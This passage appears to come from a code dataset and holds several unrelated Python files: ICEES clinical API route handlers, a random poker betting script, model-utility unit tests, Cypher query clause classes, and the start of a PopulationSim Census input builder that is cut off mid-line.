value\": str(ex)}\n\n maximum_p_value = obj.get(\"maximum_p_value\", 1)\n correction = obj.get(\"correction\")\n return_value = sql.select_associations_to_all_features(\n conn,\n table,\n year,\n cohort_id,\n feature,\n maximum_p_value,\n correction=correction,\n )\n\n if associations_have_feature_matrices(return_value):\n return {\"return value\": return_value}\n else:\n return {\"return value\": \"Empty query result returned. Please try again\"}\n\n\nwith open(\"examples/associations_to_all_features2.json\") as stream:\n ASSOCIATIONS_TO_ALL_FEATURES2_EXAMPLE = json.load(stream)\n\n\n@ROUTER.post(\n \"/{table}/cohort/{cohort_id}/associations_to_all_features2\",\n response_model=Dict,\n)\ndef associations_to_all_features2(\n table: str,\n cohort_id: str,\n year: Optional[str] = None,\n obj: AllFeaturesAssociation2 = Body(\n ...,\n example=ASSOCIATIONS_TO_ALL_FEATURES2_EXAMPLE,\n ),\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Exploratory 1 X N feature associations.\n\n Users select a predefined cohort and a feature variable of interest and\n bins, which can be combined, and the service returns a 1 x N feature table\n with corrected Chi Square statistics and associated P values.\n \"\"\"\n validate_table(table)\n feature = to_qualifiers2(obj[\"feature\"])\n try:\n validate_feature_value_in_table_column_for_equal_operator(conn, table, feature)\n except RuntimeError as ex:\n return {\"return value\": str(ex)}\n\n to_validate_range = obj.get(\"check_coverage_is_full\", False)\n if to_validate_range:\n validate_range(conn, table, feature)\n maximum_p_value = obj[\"maximum_p_value\"]\n correction = obj.get(\"correction\")\n return_value = sql.select_associations_to_all_features(\n conn,\n table,\n year,\n cohort_id,\n feature,\n maximum_p_value,\n correction=correction,\n )\n if associations_have_feature_matrices(return_value):\n return {\"return value\": return_value}\n else:\n return {\"return value\": \"Empty query result returned. 
Please try again\"}\n\n\n@ROUTER.get(\n \"/{table}/cohort/{cohort_id}/features\",\n response_model=Dict,\n)\ndef features(\n table: str,\n cohort_id: str,\n year: Optional[str] = None,\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Feature-rich cohort discovery.\n\n Users select a predefined cohort as the input parameter, and the service\n returns a profile of that cohort in terms of all feature variables.\n \"\"\"\n validate_table(table)\n cohort_meta = sql.get_features_by_id(conn, table, cohort_id)\n if cohort_meta is None:\n return_value = \"Input cohort_id invalid. Please try again.\"\n else:\n cohort_features, cohort_year = cohort_meta\n return_value = sql.get_cohort_features(\n conn,\n table,\n year,\n cohort_features,\n cohort_year,\n )\n\n return {\"return value\": return_value}\n\n\n@ROUTER.get(\n \"/{table}/{feature}/identifiers\",\n response_model=Dict,\n)\ndef identifiers(\n table: str,\n feature: str,\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Feature identifiers.\"\"\"\n validate_table(table)\n return_value = {\n \"identifiers\": get_identifiers(table, feature)\n }\n return {\"return value\": return_value}\n\n\n@ROUTER.get(\n \"/{table}/name/{name}\",\n response_model=Dict,\n)\ndef get_name(\n table: str,\n name: str,\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Return cohort id associated with name.\"\"\"\n validate_table(table)\n return_value = sql.get_id_by_name(conn, table, name)\n return {\"return value\": return_value}\n\n\n@ROUTER.post(\n \"/{table}/name/{name}\",\n response_model=Dict,\n)\ndef post_name(\n table: str,\n name: str,\n obj: AddNameById,\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Associate name with cohort id.\"\"\"\n validate_table(table)\n return_value = sql.add_name_by_id(\n conn,\n table,\n name,\n obj[\"cohort_id\"],\n )\n return {\"return value\": return_value}\n\n\nwith open(\"examples/knowledge_graph.json\") as stream:\n KNOWLEDGE_GRAPH_EXAMPLE = json.load(stream)\n\n\n@ROUTER.post(\n \"/knowledge_graph\",\n response_model=Union[Message, Dict],\n)\ndef knowledge_graph(\n obj: Query = Body(..., example=KNOWLEDGE_GRAPH_EXAMPLE),\n reasoner: bool = False,\n verbose: bool = False,\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Query for knowledge graph associations between concepts.\"\"\"\n return_value = knowledgegraph.get(conn, obj, verbose=verbose)\n\n return_value = {\n \"message\": {\n \"query_graph\": return_value.pop(\"query_graph\"),\n \"knowledge_graph\": return_value.pop(\"knowledge_graph\"),\n \"results\": return_value.pop(\"results\"),\n },\n **return_value,\n }\n if reasoner:\n return return_value\n return {\"return value\": return_value}\n\n\n@ROUTER.get(\n \"/knowledge_graph/schema\",\n response_model=Dict,\n)\ndef knowledge_graph_schema(\n reasoner: bool = False,\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Query the ICEES clinical reasoner for knowledge graph schema.\"\"\"\n return_value = knowledgegraph.get_schema()\n if reasoner:\n return return_value\n return {\"return value\": return_value}\n\n\n@ROUTER.get(\n \"/meta_knowledge_graph\",\n tags=[\"trapi\"],\n)\ndef predicates(\n api_key: APIKey = Depends(get_api_key),\n):\n \"\"\"Get meta-knowledge graph.\"\"\"\n all_categories = set()\n id_prefixes = defaultdict(set)\n for feature in mappings:\n categories = mappings[feature][\"categories\"]\n all_categories.update(categories)\n 
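# A minimal standalone sketch of the prefix grouping performed above, with
# hypothetical feature-to-identifier data standing in for the real
# mappings / input_dict tables:
from collections import defaultdict

feature_categories = {"AsthmaDx": ["biolink:Disease"]}          # hypothetical
feature_identifiers = {"AsthmaDx": ["MONDO:0004979", "HP:0002099"]}  # hypothetical

id_prefixes = defaultdict(set)
for feature, categories in feature_categories.items():
    for category in categories:
        for curie in feature_identifiers[feature]:
            # A CURIE's prefix is everything before the first colon.
            id_prefixes[category].add(curie.split(":")[0])

print({cat: sorted(p) for cat, p in id_prefixes.items()})
# {'biolink:Disease': ['HP', 'MONDO']}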
identifiers = input_dict[\"patient\"][feature]\n for category in categories:\n for identifier in identifiers:\n id_prefixes[category].add(identifier.split(\":\")[0])\n id_prefixes = {\n key: list(value)\n for key, value in id_prefixes.items()\n }\n return {\n \"nodes\": {\n category: {\"id_prefixes\": prefixes}\n for category, prefixes in id_prefixes.items()\n },\n \"edges\": [\n {\n \"subject\": sub,\n \"object\": obj,\n \"predicate\": \"biolink:correlated_with\",\n }\n for sub in all_categories for obj in all_categories\n ] + [\n {\n \"subject\": sub,\n \"object\": obj,\n \"predicate\": \"biolink:has_real_world_evidence_of_association_with\",\n }\n for sub in all_categories for obj in all_categories\n ],\n }\n\n\nwith open(\"examples/knowledge_graph_overlay.json\") as stream:\n KG_OVERLAY_EXAMPLE = json.load(stream)\n\n\n@ROUTER.post(\n \"/knowledge_graph_overlay\",\n response_model=Union[Message, Dict],\n)\ndef knowledge_graph_overlay(\n obj: Query = Body(..., example=KG_OVERLAY_EXAMPLE),\n reasoner: bool = False,\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Query for knowledge graph co-occurrence overlay.\"\"\"\n return_value = knowledgegraph.co_occurrence_overlay(\n conn,\n obj,\n )\n\n return_value = {\n \"message\": {\n \"query_graph\": obj[\"message\"].get(\"query_graph\", None),\n \"knowledge_graph\": return_value.pop(\"knowledge_graph\"),\n \"results\": obj[\"message\"].get(\"results\", None),\n },\n **return_value,\n }\n if reasoner:\n return return_value\n return {\"return value\": return_value}\n\n\nwith open(\"examples/knowledge_graph_one_hop.json\") as stream:\n KG_ONEHOP_EXAMPLE = json.load(stream)\n\n\ndef knowledge_graph_one_hop(\n obj: Query = Body(..., example=KG_ONEHOP_EXAMPLE),\n reasoner: bool = True,\n verbose: bool = False,\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Query the ICEES clinical reasoner for knowledge graph one hop.\"\"\"\n if obj.get(\"workflow\", [{\"id\": \"lookup\"}]) != [{\"id\": \"lookup\"}]:\n raise HTTPException(400, \"The only supported workflow is a single 'lookup' operation\")\n return_value = knowledgegraph.one_hop(conn, obj, verbose=verbose)\n\n return_value = {\n \"message\": {\n \"query_graph\": return_value.pop(\"query_graph\"),\n \"knowledge_graph\": return_value.pop(\"knowledge_graph\", None),\n \"results\": return_value.pop(\"results\", None),\n },\n \"workflow\": [\n {\"id\": \"lookup\"},\n ],\n **return_value,\n }\n if reasoner:\n return return_value\n return {\"return value\": return_value}\n\n\nROUTER.post(\n \"/knowledge_graph_one_hop\",\n response_model=Dict,\n deprecated=True,\n)(knowledge_graph_one_hop)\n\n\nfeature_to_curies = {\n feature: value[\"identifiers\"]\n for feature, value in mappings.items()\n}\n\nfeature_to_categories = {\n feature: value[\"categories\"]\n for feature, value in mappings.items()\n}\n\ncurie_to_features = defaultdict(list)\nfor feature, value in mappings.items():\n for identifier in value[\"identifiers\"]:\n curie_to_features[identifier].append(feature)\n\ncategory_to_features = defaultdict(list)\nfor feature, value in mappings.items():\n for category in value[\"categories\"]:\n category_to_features[category].append(feature)\n\n\ndef features_from_node(source_node):\n return [\n feature\n for curie in source_node[\"ids\"]\n for feature in curie_to_features[curie]\n ] if source_node.get(\"ids\") is not None else [\n feature\n for category in source_node[\"categories\"]\n for feature in category_to_features[category]\n 
]\n\n\n# feature_names = correlations[0][1:]\n# correlations = [row[1:] for row in correlations[1:]]\n# correlations = {\n# tuple(sorted((feature_names[irow], feature_names[icol]))): float(correlations[irow][icol])\n# for irow in range(0, len(correlations))\n# for icol in range(irow + 1, len(correlations))\n# }\n\n\ndef knode(source_feature):\n source_curies = feature_to_curies[source_feature]\n source_id, source_synonyms = knowledgegraph.gen_node_id_and_equivalent_ids(source_curies)\n source_categories = feature_to_categories[source_feature]\n return source_id, {\n \"name\": source_feature,\n \"attributes\": [\n {\n \"attribute_type_id\": \"biolink:synonym\",\n \"value\": source_synonyms,\n }\n ],\n \"categories\": source_categories,\n }\n\n\ndef query(\n obj: Query = Body(..., example=KG_ONEHOP_EXAMPLE),\n) -> Dict:\n \"\"\"Solve a one-hop TRAPI query.\"\"\"\n if obj.get(\"workflow\", [{\"id\": \"lookup\"}]) != [{\"id\": \"lookup\"}]:\n raise HTTPException(400, \"The only supported workflow is a single 'lookup' operation\")\n qgraph = copy.deepcopy(obj[\"message\"][\"query_graph\"])\n normalize_qgraph(qgraph)\n if len(qgraph[\"nodes\"]) != 2:\n raise NotImplementedError(\"Number of nodes in query graph must be 2\")\n if len(qgraph[\"edges\"]) != 1:\n raise NotImplementedError(\"Number of edges in query graph must be 1\")\n qedge_id, qedge = next(iter(qgraph[\"edges\"].items()))\n if (\n \"biolink:correlated_with\" not in qedge[\"predicates\"] and\n \"biolink:has_real_world_evidence_of_association_with\" not in qedge[\"predicates\"]\n ):\n return {\n \"message\": {\n \"query_graph\": qgraph,\n \"knowledge_graph\": {\"nodes\": {}, \"edges\": {}},\n \"results\": [],\n }\n }\n\n source_qid = qedge[\"subject\"]\n source_qnode = qgraph[\"nodes\"][source_qid]\n target_qid = qedge[\"object\"]\n target_qnode = qgraph[\"nodes\"][target_qid]\n\n # features = correlations[0]\n source_features = features_from_node(source_qnode)\n target_features = features_from_node(target_qnode)\n kedge_pairs = [\n tuple(sorted([source_feature, target_feature]))\n for source_feature in source_features\n for target_feature in target_features\n ]\n\n kgraph = {\n \"nodes\": {},\n \"edges\": {},\n }\n results = []\n for pair in kedge_pairs:\n if pair not in correlations:\n continue\n p_value = correlations[pair]\n source_feature, target_feature = pair # note the source and target may be flipped, which is okay\n source_kid, source_knode = knode(source_feature)\n target_kid, target_knode = knode(target_feature)\n kgraph[\"nodes\"].update({\n source_kid: source_knode,\n target_kid: target_knode,\n })\n kedges = knowledgegraph.knowledge_graph_edges(source_kid, target_kid, p_value=p_value)\n kgraph[\"edges\"].update(kedges)\n results.append({\n \"node_bindings\": {\n source_qid: [{\"id\": source_kid}],\n target_qid: [{\"id\": target_kid}],\n },\n \"edge_bindings\": {\n qedge_id: [\n {\n \"id\": kedge_id,\n }\n for kedge_id in kedges\n ]\n },\n \"score\": p_value,\n \"score_name\": \"p value\"\n })\n\n return {\n \"message\": {\n \"query_graph\": obj[\"message\"][\"query_graph\"], # Return unmodified\n \"knowledge_graph\": kgraph,\n \"results\": results,\n },\n \"workflow\": [\n {\"id\": \"lookup\"},\n ],\n }\nROUTER.post(\n \"/query\",\n response_model=Dict,\n tags=[\"reasoner\"],\n)(knowledge_graph_one_hop) # Change back to query\n\n@ROUTER.get(\n \"/bins\",\n response_model=Dict,\n)\ndef handle_bins(\n year: str = None,\n table: str = None,\n feature: str = None,\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n 
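# The one-hop lookup above boils down to a dictionary of precomputed p-values
# keyed by sorted feature-name pairs; a minimal sketch of that pairing and
# lookup, with made-up feature names and values:
correlations = {("AsthmaDx", "ObesityDx"): 0.003}  # made-up p-value table

source_features = ["AsthmaDx"]
target_features = ["ObesityDx", "CoughDx"]

results = []
for s in source_features:
    for t in target_features:
        pair = tuple(sorted((s, t)))
        if pair in correlations:  # pairs without a precomputed p-value are skipped
            results.append({"pair": pair, "score": correlations[pair]})

print(results)  # [{'pair': ('AsthmaDx', 'ObesityDx'), 'score': 0.003}]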
\"\"\"Return bin values.\"\"\"\n input_file = os.path.join(get_config_path(), \"bins.json\") \n with open(input_file, \"r\") as stream:\n bins = json.load(stream)\n if feature is not None:\n bins = {\n year_key: {\n table_key: table_value.get(feature, None)\n for table_key, table_value in year_value.items()\n }\n for year_key, year_value in bins.items()\n }\n if table is not None:\n bins = {\n year_key: year_value.get(table, None)\n for year_key, year_value in bins.items()\n }\n if year is not None:\n bins = bins.get(year, None)\n return {\"return_value\": bins}\n","sub_path":"icees_api/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":24182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"481890980","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nimport sys\nfrom random import randint\nfrom random import uniform\n\noldbet = float(sys.argv[1])\nbiggest_bet = float(sys.argv[2])\nstack = sys.argv[3]\nbet = 0\nrnd = randint(0,100)\n\nif rnd <= 30:\n #fold\n bet = 0\nelif rnd <= 60:\n #flat calls\n bet = biggest_bet - bet\nelif rnd <= 70:\n #3 bet\n bet = 3 * biggest_bet\nelse:\n #allin\n bet = float(stack) + oldbet\nprint(bet)","sub_path":"postflop.py","file_name":"postflop.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"263191075","text":"import unittest\nimport requests\nfrom io import BytesIO\nfrom PIL import Image\nimport torch\nfrom torchvision.models import mobilenet_v2\nfrom torchvision.transforms import transforms\n\nfrom holocron import utils\n\n\nclass Tester(unittest.TestCase):\n\n def test_gradcam(self):\n\n # Get a pretrained model\n model = mobilenet_v2(pretrained=True)\n conv_layer = 'features'\n\n # Hook the corresponding layer in the model\n gradcam = utils.ActivationMapper(model, conv_layer)\n\n # Get a dog image\n URL = 'https://www.woopets.fr/assets/races/000/066/big-portrait/border-collie.jpg'\n response = requests.get(URL)\n\n # Forward an image\n pil_img = Image.open(BytesIO(response.content), mode='r').convert('RGB')\n preprocess = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n img_tensor = preprocess(pil_img)\n out = model(img_tensor.unsqueeze(0))\n\n # Border collie index in ImageNet\n class_idx = 232\n\n # Use the hooked data to compute activation map\n activation_map = gradcam.get_activation_maps(out, class_idx)\n\n self.assertIsInstance(activation_map, torch.Tensor)\n self.assertEqual(activation_map.shape, (1, 7, 7))\n\n def test_get_module_names(self):\n\n # Get a model\n model = mobilenet_v2().eval()\n\n layer_names = utils.get_module_names(model)\n\n self.assertIsInstance(layer_names, list)\n self.assertEqual(len(layer_names), 141)\n self.assertEqual(layer_names[42], 'features.6.conv.0.2')\n\n def test_module_summary(self):\n\n # Get a model\n model = mobilenet_v2().eval()\n\n exec_sum = utils.module_summary(model, input_shape=(3, 224, 224))\n\n self.assertIsInstance(exec_sum, list)\n self.assertEqual(len(exec_sum), 141)\n self.assertEqual(exec_sum[42]['output_shape'], (None, 192, 28, 28))\n\n def test_summary(self):\n\n # Get a model\n model = mobilenet_v2().eval()\n\n summary_str = utils.summary(model, input_shape=(3, 224, 224))\n\n self.assertEqual(summary_str.split('\\n')[-9], 'Total params: 
3,504,872')\n","sub_path":"test/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"48805020","text":"\nfrom .helper import key_for_cypher, value_for_cypher\n\nclass ClauseElement(object):\n \"\"\"\n Base class for filter elements that will be translated to Cypher.\n \"\"\"\n sign = ''\n template = \"{} {} {}\"\n def __init__(self, attribute, value):\n self.attribute = attribute\n self.value = value\n\n def __repr__(self):\n return ''.format(self.for_cypher())\n\n def __hash__(self):\n return hash((self.attribute, self.sign, self.value))\n\n def cypher_value_string(self):\n \"\"\"\n Create a Cypher parameter for the value of the clause.\n \"\"\"\n return '{%s}' % self.attribute.alias\n\n @property\n def annotations(self):\n \"\"\"\n Get all annotations involved in the clause.\n \"\"\"\n annotations = [self.attribute.base_annotation]\n try:\n annotations.append(self.value.base_annotation)\n except AttributeError:\n pass\n return annotations\n\n @property\n def attributes(self):\n \"\"\"\n Get all attributes involved in the clause.\n \"\"\"\n attributes = [self.attribute]\n if hasattr(self.value, 'annotation'):\n attributes.append(self.value)\n return attributes\n\n def for_cypher(self):\n \"\"\"\n Return a Cypher representation of the clause.\n \"\"\"\n try:\n value = self.value.for_cypher()\n except AttributeError:\n value = self.cypher_value_string()\n return self.template.format(self.attribute.for_cypher(),\n self.sign,\n value)\n\nclass EqualClauseElement(ClauseElement):\n \"\"\"\n Clause for asserting equality in a filter.\n \"\"\"\n sign = '='\n\nclass GtClauseElement(ClauseElement):\n \"\"\"\n Clause for asserting greater than in a filter.\n \"\"\"\n sign = '>'\n\nclass GteClauseElement(ClauseElement):\n \"\"\"\n Clause for asserting greater than or equal in a filter.\n \"\"\"\n sign = '>='\n\nclass LtClauseElement(ClauseElement):\n \"\"\"\n Clause for asserting less than in a filter.\n \"\"\"\n sign = '<'\n\nclass LteClauseElement(ClauseElement):\n \"\"\"\n Clause for asserting less than or equal in a filter.\n \"\"\"\n sign = '<='\n\nclass NotEqualClauseElement(ClauseElement):\n \"\"\"\n Clause for asserting not equal in a filter.\n \"\"\"\n sign = '<>'\n\nclass InClauseElement(ClauseElement):\n \"\"\"\n Clause for asserting membership in a filter.\n \"\"\"\n sign = 'IN'\n\nclass RegexClauseElement(ClauseElement):\n \"\"\"\n Clause for filtering based on regular expressions.\n \"\"\"\n sign = '=~'\n\nclass ContainsClauseElement(ClauseElement):\n \"\"\"\n Clause for filtering based on hierarchical relations.\n \"\"\"\n sign = 'contains'\n template = '''({alias})<-[:contained_by]-({token})-[:is_a]->({type} {{{label}: {value}}})'''\n def for_cypher(self):\n kwargs = {'alias':self.attribute.annotation.alias,\n 'value':value_for_cypher(self.value),\n 'label': key_for_cypher(self.attribute.label),\n 'type': ':{}_type'.format(self.attribute.annotation.type),\n 'token': ':{}'.format(self.attribute.annotation.type)}\n return self.template.format(**kwargs)\n\nclass AlignmentClauseElement(ClauseElement):\n \"\"\"\n Base class for filtering based on alignment.\n \"\"\"\n template = \"{first}.label = {second}.label\"\n side = ''\n def __init__(self, first, second):\n from .attributes import HierarchicalAnnotation\n self.first = first\n\n if not isinstance(first, HierarchicalAnnotation) and not isinstance(second, HierarchicalAnnotation):\n second = 
getattr(self.first, second.type)\n self.second = second\n\n def __hash__(self):\n return hash((self.first, self.template, self.second))\n\n @property\n def annotations(self):\n return [self.first, self.second]\n\n @property\n def attributes(self):\n return [self.first.id]\n\n def for_cypher(self):\n kwargs = {'second_node_alias': self.second.alias,\n 'first_node_alias': self.first.alias}\n return self.template.format(**kwargs)\n\nclass RightAlignedClauseElement(AlignmentClauseElement):\n \"\"\"\n Clause for filtering based on right alignment.\n \"\"\"\n template = '''not ({first_node_alias})-[:precedes]->()-[:contained_by*]->({second_node_alias})'''\n alias_to_use = 'end_alias'\n\nclass LeftAlignedClauseElement(AlignmentClauseElement):\n \"\"\"\n Clause for filtering based on left alignment.\n \"\"\"\n template = '''not ({first_node_alias})<-[:precedes]-()-[:contained_by*]->({second_node_alias})'''\n alias_to_use = 'begin_alias'\n\nclass NotRightAlignedClauseElement(RightAlignedClauseElement):\n \"\"\"\n Clause for filtering based on not being right aligned.\n \"\"\"\n template = '''({first_node_alias})-[:precedes]->()-[:contained_by*]->({second_node_alias})'''\n\nclass NotLeftAlignedClauseElement(LeftAlignedClauseElement):\n \"\"\"\n Clause for filtering based on not being left aligned.\n \"\"\"\n template = '''({first_node_alias})<-[:precedes]-()-[:contained_by*]->({second_node_alias})'''\n\n","sub_path":"polyglotdb/graph/elements.py","file_name":"elements.py","file_ext":"py","file_size_in_byte":5162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"628740642","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n\n\n# %%\n# This program prepares all inputs files needed by PopulationSim(RSG), including configuration, geo_crosswalk, Census marginals and PUMS sample households and persons\n# Syntax: > python popsim_input_maker.py key yaml (key: Census API key; yaml: a yaml configuration file such as region.yaml)\n\n# Inputs:\n# [year]/region_[year].yaml (yaml config input for input_maker.py)\n# [year]/settings_[year].yaml (a generic setting file for populationsim)\n# [year]/control_pre_[year].csv (control file same as populationsim, with additional \"acs_variables\" column)\n# PUMS/xxxxhxx.csv (PUMS household samples)\n# PUMS/xxxxpxx.csv (PUMS person samples)\n# geo/tract0010_to_puma.csv (tract00 and tract10 to PUMA crosswalk file)\n# geo/tract10_detroit_city.csv (tract10 to city_id, including Detroit neighborhood, equiv file)\n# geo/2010_Census_Tract_to_2010_PUMA.txt (tract2010 to PUMA)\n\n# outputs:\n# [year]/data/SEMCOG_[year]_control_totals_[geo].csv (marginal controls by geography)\n# [year]/data/SEMCOG_[year]_controls.csv (same as control_pre)\n# [year]/data/SEMCOG_[year]_geo_cross_walk.csv (geo cross walk)\n# [year]/data/SEMCOG_[year]_seed_households.csv (PUMS HH samples selected by synthesizing region)\n# [year]/data/SEMCOG_[year]_seed_persons.csv (PUMS person samples selected by synthesizing region)\n# [year]/data/SEMCOG_[year]_settings.yaml (modified setting file)\n# %%\nimport os\nimport re\nimport time\nimport pandas as pd\nfrom census import Census\nimport oyaml as yaml\nfrom collections import defaultdict\nfrom input_utils import *\nimport argparse\nimport shutil\n\n# %%\nparser = argparse.ArgumentParser()\nparser.add_argument(\"key\", help=\"Census API key\")\nparser.add_argument(\"yaml\", help=\"yaml configuration file name\")\nargs = parser.parse_args()\nt0 = time.time()\n\n# 
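# A minimal re-creation of how the ClauseElement classes above render a
# filter to Cypher, assuming hypothetical attribute names; the comparison
# value travels separately as a Cypher parameter:
class Attribute:
    # Hypothetical stand-in for polyglotdb's attribute objects.
    def __init__(self, alias, label):
        self.alias = alias
        self.label = label

    def for_cypher(self):
        return f"{self.alias}.{self.label}"


class GtClause:
    sign = ">"

    def __init__(self, attribute):
        self.attribute = attribute

    def for_cypher(self):
        # Placeholder {alias} is filled in by the driver at query time.
        return f"{self.attribute.for_cypher()} {self.sign} {{{self.attribute.alias}}}"


print(GtClause(Attribute("node_phone", "duration")).for_cypher())
# node_phone.duration > {node_phone}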
# %%\nconf = yaml.load(open(\"./\" + args.yaml, \"r\"), Loader=yaml.Loader)\n# conf = yaml.load(open(\"./2020/region_2020.yaml\", \"r\"), Loader=yaml.Loader)\n\n# %%\nprj = conf[\"project\"]\nprj_name = prj[\"name\"]\ntarget = prj[\"target\"]\nacs_year = prj[\"acs_year\"]\nacs_sample = prj[\"acs_sample\"] # acs5 or acs1\nprj_folder = f\"{acs_year}/\"\nsettings_file = prj_folder + prj[\"settings\"].format(str(acs_year))\npre_control = prj_folder + prj[\"pre_control\"].format(str(acs_year))\nh_pums_csv = prj[\"h_pums_csv\"]\np_pums_csv = prj[\"p_pums_csv\"]\n\ngeo = conf[\"geography\"]\nstate = geo[\"state\"][0]\ncounties = geo[\"counties\"]\n\noutput_folder = prj_folder + \"data/\"\nif not os.path.exists(output_folder):\n    os.makedirs(output_folder)\noutput_geo_cross = \"{}_{}_geo_cross_walk.csv\".format(prj_name, str(acs_year))\noutput_control = \"{}_{}_control_totals_.csv\".format(prj_name, str(acs_year))\noutput_seed_hhs = \"{}_{}_seed_households.csv\".format(prj_name, str(acs_year))\noutput_seed_persons = \"{}_{}_seed_persons.csv\".format(prj_name, str(acs_year))\n\nprint(f\"\\n *** synthesizing {target} for year {acs_year} ***\")\n\n\n# %% [markdown]\n# step 1. make geographic crosswalk file\nc = Census(args.key, year=acs_year)\n\n\n# %%\nprint(\n    f\"\\nPreparing Census geographies crosswalk: \\n\\tstate: {state} \\n\\tcounty: {counties}\"\n)\n# download Census BGs for this region\nacgeo = Census_Downloader(c.acs5, state, counties, \"*\", \"*\")\n\ndf_geo = pd.DataFrame.from_dict(acgeo.download(\"NAME\")).drop(\"NAME\", axis=1)\ndf_geo[\"tractid\"] = df_geo[\"state\"] + df_geo[\"county\"] + df_geo[\"tract\"]\ndf_geo[\"blkgrpid\"] = df_geo[\"tractid\"] + df_geo[\"block group\"]\ndf_geo.columns = [col.upper() for col in df_geo.columns]\n\n# %%\n# depending on the synthesis year, switch between tract-PUMA crosswalk files\nif acs_year >= 2020:\n    df_tract_puma = pd.read_csv(geo[\"tract20_puma10_file\"], dtype=str)\n    df_tract_puma.rename(columns={\"PUMACE10\": \"PUMA\"}, inplace=True)\nelif (acs_year >= 2017) & (acs_year < 2020):\n    df_tract_puma = pd.read_csv(geo[\"tract10_puma10_file\"], dtype=str)\n    df_tract_puma.rename(columns={\"PUMA5CE\": \"PUMA\"}, inplace=True)\nelif (acs_year >= 2010) & (acs_year <= 2016):\n    df_tract_puma = pd.read_csv(\n        \"../\" + pre_folder + geo[\"tract_puma0010_file\"], dtype=str\n    )\n    df_tract_puma.columns = [col.upper() for col in df_tract_puma.columns]\n    if acs_year >= 2012:\n        df_tract_puma.fillna(\"00000\", inplace=True)\n        df_tract_puma[\"PUMA\"] = df_tract_puma[\"PUMA10_ID\"] + df_tract_puma[\"PUMA00_ID\"]\n    else:\n        df_tract_puma.rename(columns={\"PUMA00_ID\": \"PUMA\"}, inplace=True)\nelse:\n    print(\"synthesis year should be 2010 or later\")\n    exit()\n\ndf_tract_puma = df_tract_puma.loc[df_tract_puma.STATEFP == acgeo.states]\ndf_tract_puma[\"COUNTYID\"] = df_tract_puma[\"STATEFP\"] + df_tract_puma[\"COUNTYFP\"]\ndf_tract_puma[\"TRACTID\"] = df_tract_puma[\"COUNTYID\"] + df_tract_puma[\"TRACTCE\"]\n\n\n# %%\n# join tract-PUMA and create geo cross file\ndf_geo_cross = pd.merge(df_geo, df_tract_puma, on=\"TRACTID\", how=\"left\")\ndf_geo_cross[\"REGION\"] = 2\ndf_geo_cross = df_geo_cross[[\"TRACTID\", \"BLKGRPID\", \"PUMA\", \"COUNTYID\", \"REGION\"]]\nprint(\" saving geo cross walk to: \" + output_folder + output_geo_cross)\ndf_geo_cross.to_csv(output_folder + output_geo_cross)\n
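# A toy version of the crosswalk join above, with made-up tract and PUMA
# codes to show the merge shape:
import pandas as pd

# Made-up block groups and a tract-to-PUMA lookup; real codes come from Census files.
df_geo_demo = pd.DataFrame({"TRACTID": ["26125000100", "26125000200"],
                            "BLKGRPID": ["261250001001", "261250002001"]})
df_tp_demo = pd.DataFrame({"TRACTID": ["26125000100", "26125000200"],
                           "PUMA": ["02702", "02703"]})

df_cross_demo = pd.merge(df_geo_demo, df_tp_demo, on="TRACTID", how="left")
df_cross_demo["REGION"] = 2  # single synthesis region
print(df_cross_demo[["TRACTID", "BLKGRPID", "PUMA", "REGION"]])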
# %% [markdown]\n# step 2. download and compile marginal control files\n\n# %%\n# download Census marginal controls\n# Census controls variables are defined in \"controls_pre\" table (popsim \"controls\" table + \"acs_variables\" field)\n# \"acs_variables\" contains Census variables and expressions\n#\n\ncs = eval(f\"c.{acs_sample}\") # set API type\n\nprint(\"\\nCreating popsim marginal controls: \", acs_year)\nprint(\" downloading Census variables ...\")\ndfc = pd.read_csv(pre_control)\ndic_margs = {}\nfor geo, dfgeo in dfc.groupby(\"geography\"):\n    full_vars = list(\n        set(\n            re.findall(\n                r\"[B-C][0-9]{5}[A-Z]{0,1}_[0-9]{3}E\", str(list(dfgeo.acs_variables))\n            )\n        )\n    )\n    if geo == \"BLKGRP\":\n        acd = Census_Downloader(cs, state, counties, \"*\", \"*\")\n        geo_cols = [\"state\", \"county\", \"tract\", \"block group\"]\n    elif geo == \"TRACT\":\n        acd = Census_Downloader(cs, state, counties, \"*\")\n        geo_cols = [\"state\", \"county\", \"tract\"]\n    elif geo == \"COUNTY\":\n        acd = Census_Downloader(cs, state, counties)\n        geo_cols = [\"state\", \"county\"]\n\n    print(\"\\t\" + geo + \" marginals \")\n    dic_margs[geo] = acd.download(full_vars).set_index(geo_cols)\n\n    if \"GEO_ID\" in dic_margs[geo].columns:\n        # new Census API downloads an extra \"GEO_ID\" column\n        dic_margs[geo].drop(\"GEO_ID\", axis=1, inplace=True)\n\n# %%\n# Compute popsim control variables from Census marginals\nprint(\" compiling popsim control fields ...\")\nfor geo, dfg in dfc.groupby(\"geography\"):\n    dic_margs[geo] = dic_margs[geo].astype(float).fillna(0)\n    for ind, r in dfg.iterrows():\n        dic_margs[geo][r[\"control_field\"]] = dic_margs[geo].eval(\n            